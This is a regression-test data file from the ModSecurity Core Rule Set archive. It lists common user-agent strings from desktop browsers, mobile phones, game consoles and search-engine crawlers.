\"skeletonid\"" ���������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/utils/�������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021341�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/utils/data/��������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0022252�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/utils/data/popularUAs.data�����������������������������������0000664�0000000�0000000�00000154011�14461225151�0025202�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������AdsBot-Google ( http://www.google.com/adsbot.html) Avant Browser/1.2.789rel1 (http://www.avantbrowser.com) Baiduspider ( http://www.baidu.com/search/spider.htm) BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103 BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0) BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0 BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100 BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105 BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0 BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123 Bloglines/3.1 (http://www.bloglines.com) CSSCheck/1.2.2 DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) DoCoMo/2.0 SH901iC(c100;TB;W24H12) Download Demon/3.5.0.11 ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19) ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33) ELinks/0.12~pre5-4 ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41) EmailWolf 1.00 FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler) FeedFetcher-Google; ( http://www.google.com/feedfetcher.html) Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php) Googlebot-Image/1.0 Googlebot-News Googlebot-Video/1.0 Googlebot/2.1 ( http://www.googlebot.com/bot.html) Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua) Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0 HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 HTMLParser/1.6 Java/1.6.0_13 Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode) LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84) Links (2.1pre15; Linux 2.4.26 i686; 158x61) Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) Links/0.9.1 (Linux 2.4.24; i386;) Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12 Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0 MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0 MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0 MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 Mediapartners-Google Microsoft URL Control - 6.00.8862 Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 Mozilla/2.0 (compatible; Ask Jeeves/Teoma) Mozilla/2.02E (Win95; U) Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS) Mozilla/3.01Gold (Win95; I) Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0 Mozilla/4.0 (PSP (PlayStation Portable); 2.00) Mozilla/4.0 (compatible; Dillo 3.0) Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180) Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800) Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1) Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1) Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 ) Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C) Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US] Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30) Mozilla/4.8 [en] (Windows NT 5.1; U) Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u) Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.1.0.2342 Mobile Safari/537.10+ Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1 Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate) Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3 Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3 Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355 Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1 Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true Mozilla/5.0 (Linux; U; Android 4.1; en-us; sdk Build/MR1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:20.0) Gecko/20100101 Firefox/20.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20120813 Firefox/16.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML like Gecko) Version/6.0.2 Safari/536.26.17 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.31 (KHTML like Gecko) Chrome/26.0.1410.63 Safari/537.31 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 Silk-Accelerated=true Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941 Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 Mozilla/5.0 (PLAYSTATION 3; 1.10) Mozilla/5.0 (PLAYSTATION 3; 2.00) Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ Mozilla/5.0 (PlayBook; U; RIM Tablet OS 2.1.0; en-US) AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 